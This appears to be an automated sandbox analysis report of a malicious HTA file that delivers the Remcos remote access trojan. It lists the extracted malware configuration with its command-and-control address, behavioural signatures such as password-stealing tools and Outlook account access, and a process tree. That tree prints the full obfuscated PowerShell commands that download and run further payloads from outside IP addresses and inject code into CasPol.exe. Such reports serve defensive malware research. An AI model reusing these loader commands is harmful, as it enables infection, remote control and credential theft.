Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250211-en -
resource tags
arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system -
submitted
13-02-2025 13:21
Static task
static1
Behavioral task
behavioral1
Sample
seemybestthingsgivenmegreatthings.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
seemybestthingsgivenmegreatthings.hta
Resource
win10v2004-20250211-en
General
-
Target
seemybestthingsgivenmegreatthings.hta
-
Size
20KB
-
MD5
13edeb7e9e1f0162da3164ea63bddd24
-
SHA1
771b89da88016a67a1e9b01a9bf75df9e51bf1d9
-
SHA256
6fe4b3d122a0358b546764010647d82d3ffde9bc778e9c778b87dec956338ff7
-
SHA512
ec855794da3cf2b6952400ae8e0d80c1b794ad5859eb950f74dd47608400a18275229b20e2b95d04556ea0281574c0cc82fd8a6ba92a7f51dd8f2fe1951558f8
-
SSDEEP
96:fzyH/4TNHHo4TNk0a3JYfYopWosHLH0Q4TN3Hv:fSTr0sSw1W
Malware Config
Extracted
remcos
RemoteHost
192.3.243.136:6878
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-JARS2X
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2676-117-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/1136-116-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4064-118-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2676-117-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4064-118-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 396 powershell.exe 22 3576 powershell.exe 37 3576 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 53 2748 Process not Found -
Evasion via Device Credential Deployment 1 IoCs
pid Process 396 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 2 IoCs
pid Process 4496 setup.exe 1556 setup.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 3576 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3576 set thread context of 4452 3576 powershell.exe 107 PID 4452 set thread context of 4064 4452 CasPol.exe 108 PID 4452 set thread context of 2676 4452 CasPol.exe 109 PID 4452 set thread context of 1136 4452 CasPol.exe 111 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\MsEdgeCrashpad\throttle_store.dat setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\BHO\ie_to_edge_bho.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_helper.exe setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ja.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\tr.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\win11\identity_helper.Sparse.Beta.msix setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\lt.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\uk.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\internal.identity_helper.exe.manifest setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\gu.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\pl.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\sk.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\sq.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\d3dcompiler_47.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\elevated_tracing_service.exe setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\beta.identity_helper.exe.manifest setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\MEIPreload\manifest.json setup.exe File opened for modification C:\Program Files\MsEdgeCrashpad\settings.dat setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Temp\source4496_2105654690\MSEDGE.7z setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\gl.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\microsoft_shell_integration.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\en-US.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\sl.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\sr-Cyrl-BA.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ug.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\vi.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Edge.dat setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\win10\identity_helper.Sparse.Beta.msix setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\fi.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\nn.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ur.pak setup.exe File opened for modification C:\Program Files\MsEdgeCrashpad\metadata setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\resources.pri setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\bn-IN.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\zh-CN.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\bs.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kn.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kok.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ro.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ru.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\concrt140.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\cs.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\it.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ms.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\MEIPreload\preloaded_data.pb setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ta.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\dxcompiler.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\eu.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\hi.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ml.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\pa.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\id.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\mip_core.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\cookie_exporter.exe setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\dxil.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Extensions\external_extensions.json setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\ffmpeg.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\win10\identity_helper.Sparse.Dev.msix setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\lv.pak setup.exe File opened for modification C:\Program Files\MsEdgeCrashpad\settings.dat setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\elevation_service.exe setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\canary.identity_helper.exe.manifest setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\stable.identity_helper.exe.manifest setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\da.pak setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4092 MicrosoftEdgeUpdate.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 396 powershell.exe 396 powershell.exe 3576 powershell.exe 3576 powershell.exe 3576 powershell.exe 3576 powershell.exe 1136 CasPol.exe 1136 CasPol.exe 4064 CasPol.exe 4064 CasPol.exe 4064 CasPol.exe 4064 CasPol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4452 CasPol.exe 4452 CasPol.exe 4452 CasPol.exe 4452 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 1136 CasPol.exe Token: 33 4496 setup.exe Token: SeIncBasePriorityPrivilege 4496 setup.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4452 CasPol.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 5072 wrote to memory of 2784 5072 mshta.exe 92 PID 5072 wrote to memory of 2784 5072 mshta.exe 92 PID 5072 wrote to memory of 2784 5072 mshta.exe 92 PID 2784 wrote to memory of 396 2784 cmd.exe 94 PID 2784 wrote to memory of 396 2784 cmd.exe 94 PID 2784 wrote to memory of 396 2784 cmd.exe 94 PID 396 wrote to memory of 4796 396 powershell.exe 95 PID 396 wrote to memory of 4796 396 powershell.exe 95 PID 396 wrote to memory of 4796 396 powershell.exe 95 PID 4796 wrote to memory of 64 4796 csc.exe 96 PID 4796 wrote to memory of 64 4796 csc.exe 96 PID 4796 wrote to memory of 64 4796 csc.exe 96 PID 396 wrote to memory of 3920 396 powershell.exe 100 PID 396 wrote to memory of 3920 396 powershell.exe 100 PID 396 wrote to memory of 3920 396 powershell.exe 100 PID 3920 wrote to memory of 3576 3920 WScript.exe 101 PID 3920 wrote to memory of 3576 3920 WScript.exe 101 PID 3920 wrote to memory of 3576 3920 WScript.exe 101 PID 3576 wrote to memory of 1384 3576 powershell.exe 106 PID 3576 wrote to memory of 1384 3576 powershell.exe 106 PID 3576 wrote to memory of 1384 3576 powershell.exe 106 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 3576 wrote to memory of 4452 3576 powershell.exe 107 PID 4452 wrote to memory of 4064 4452 CasPol.exe 108 PID 4452 wrote to memory of 4064 4452 CasPol.exe 108 PID 4452 wrote to memory of 4064 4452 CasPol.exe 108 PID 4452 wrote to memory of 4064 4452 CasPol.exe 108 PID 4452 wrote to memory of 2676 4452 CasPol.exe 109 PID 4452 wrote to memory of 2676 4452 CasPol.exe 109 PID 4452 wrote to memory of 2676 4452 CasPol.exe 109 PID 4452 wrote to memory of 2676 4452 CasPol.exe 109 PID 4452 wrote to memory of 2240 4452 CasPol.exe 110 PID 4452 wrote to memory of 2240 4452 CasPol.exe 110 PID 4452 wrote to memory of 2240 4452 CasPol.exe 110 PID 4452 wrote to memory of 1136 4452 CasPol.exe 111 PID 4452 wrote to memory of 1136 4452 CasPol.exe 111 PID 4452 wrote to memory of 1136 4452 CasPol.exe 111 PID 4452 wrote to memory of 1136 4452 CasPol.exe 111 PID 320 wrote to memory of 4496 320 MicrosoftEdge_X64_133.0.3065.59.exe 116 PID 320 wrote to memory of 4496 320 MicrosoftEdge_X64_133.0.3065.59.exe 116 PID 4496 wrote to memory of 1556 4496 setup.exe 117 PID 4496 wrote to memory of 1556 4496 setup.exe 117
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestthingsgivenmegreatthings.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POwErshELl -ex bYpaSS -NoP -w 1 -C DEVICecredENtialDEPloYMeNT.ExE ; Iex($(iex('[sYSTeM.TExT.ENCOdINg]'+[cHar]0x3A+[cHaR]0X3A+'utF8.getStRinG([systeM.COnvErT]'+[CHAR]58+[CHAR]58+'FrOMbasE64STRing('+[ChAr]34+'JDZXdzEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyRGVmSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVeW1nUk5obWosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSU9UakhFLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVlpYLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZiclJxdW9obHopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJDdGViVnZXWVUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZXdzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4xMjQvMzc5L3NlZW15YmVzdHRoaW5nc2dpdmVubWVncmVhdHRoaW5ncy5nSUYiLCIkZU52OkFQUERBVEFcc2VlbXliZXN0dGhpbmdzZ2l2ZW5tZWdyZWF0dGhpbmcudmJzIiwwLDApO3N0YXJULXNsRUVwKDMpO0luVm9rZS1pdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3NnaXZlbm1lZ3JlYXR0aGluZy52YnMi'+[cHaR]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwErshELl -ex bYpaSS -NoP -w 1 -C DEVICecredENtialDEPloYMeNT.ExE ; Iex($(iex('[sYSTeM.TExT.ENCOdINg]'+[cHar]0x3A+[cHaR]0X3A+'utF8.getStRinG([systeM.COnvErT]'+[CHAR]58+[CHAR]58+'FrOMbasE64STRing('+[ChAr]34+'JDZXdzEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyRGVmSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVeW1nUk5obWosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSU9UakhFLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVlpYLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZiclJxdW9obHopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJDdGViVnZXWVUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZXdzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4xMjQvMzc5L3NlZW15YmVzdHRoaW5nc2dpdmVubWVncmVhdHRoaW5ncy5nSUYiLCIkZU52OkFQUERBVEFcc2VlbXliZXN0dGhpbmdzZ2l2ZW5tZWdyZWF0dGhpbmcudmJzIiwwLDApO3N0YXJULXNsRUVwKDMpO0luVm9rZS1pdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3NnaXZlbm1lZ3JlYXR0aGluZy52YnMi'+[cHaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\awg31bsf\awg31bsf.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES44E4.tmp" "c:\Users\Admin\AppData\Local\Temp\awg31bsf\CSC709D3BD837E54C8689ACC39EDA726415.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:64
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestthingsgivenmegreatthing.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABsAG8AcABlAGQAIAA9ACAAJwB0AHgAdAAuAHMAZwBuAGkAaAB0AHQAYQBlAHIAZwBlAG0AbgBlAHYAaQBnAHMAZwBuAGkAaAB0AHQAcwBlAGIAeQBtAGUAZQBzAC8AOQA3ADMALwA0ADIAMQAuADMAMgAxAC4ANQA0ADIALgAyADcAMQAvAC8AOgBwAHQAdABoACcAOwAkAGgAYQBwAHAAaQBlAHIAIAA9ACAAJABsAG8AcABlAGQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAG4AaQBnAGgAdABzAGgAYQBkAGUAIAA9ACAAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMwAuADcAMwAuADEANAA4AC8AeABhAG0AcABwAC8AZwBkAGYALwBnAGQALwBVAG4AaQBmAGUAdgAuAGoAcABnACcAOwAkAGEAcgB5AGwAbwB4AHkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYgB5AGEAdABzACAAPQAgACQAYQByAHkAbABvAHgAeQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABuAGkAZwBoAHQAcwBoAGEAZABlACkAOwAkAHAAYQByAGEAbABvAGcAbwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AGEAdABzACkAOwAkAG0AeQByAG0AZQBjAG8AcABoAGkAbABlACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABkAGkAZwBlAG4AaQB0AGUAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAdABlAHQAcgBhAHAAbwBkACAAPQAgACQAcABhAHIAYQBsAG8AZwBvAG4ALgBJAG4AZABlAHgATwBmACgAJABtAHkAcgBtAGUAYwBvAHAAaABpAGwAZQApADsAJABTAG4AbwB3AGIAZQBsAHQAIAA9ACAAJABwAGEAcgBhAGwAbwBnAG8AbgAuAEkAbgBkAGUAeABPAGYAKAAkAGQAaQBnAGUAbgBpAHQAZQApADsAJAB0AGUAdAByAGEAcABvAGQAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABTAG4AbwB3AGIAZQBsAHQAIAAtAGcAdAAgACQAdABlAHQAcgBhAHAAbwBkADsAJAB0AGUAdAByAGEAcABvAGQAIAArAD0AIAAkAG0AeQByAG0AZQBjAG8AcABoAGkAbABlAC4ATABlAG4AZwB0AGgAOwAkAGcAZQByAGUAbgB1AGsAIAA9ACAAJABTAG4AbwB3AGIAZQBsAHQAIAAtACAAJAB0AGUAdAByAGEAcABvAGQAOwAkAG0AbwByAHIAaQBzACAAPQAgACQAcABhAHIAYQBsAG8AZwBvAG4ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdABlAHQAcgBhAHAAbwBkACwAIAAkAGcAZQByAGUAbgB1AGsAKQA7ACQAZAByAGUAYQBtAHcAYQByAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbQBvAHIAcgBpAHMAKQA7ACQAZQB4AHAAYQBuAGQAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGQAcgBlAGEAbQB3AGEAcgBlACkAOwAkAGEAbgB0AGgAcgBpAHMAYwB1AHMAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJABoAGEAcABwAGkAZQByACwAJwAnACwAJwAnACwAJwAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACkAKQA=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:1384
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xusbvmcavljhglu"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4064
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zoxuwemtrtbtirqnrz"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\jqdnpxxvfbtytgerajtkx"7⤵PID:2240
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\jqdnpxxvfbtytgerajtkx"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
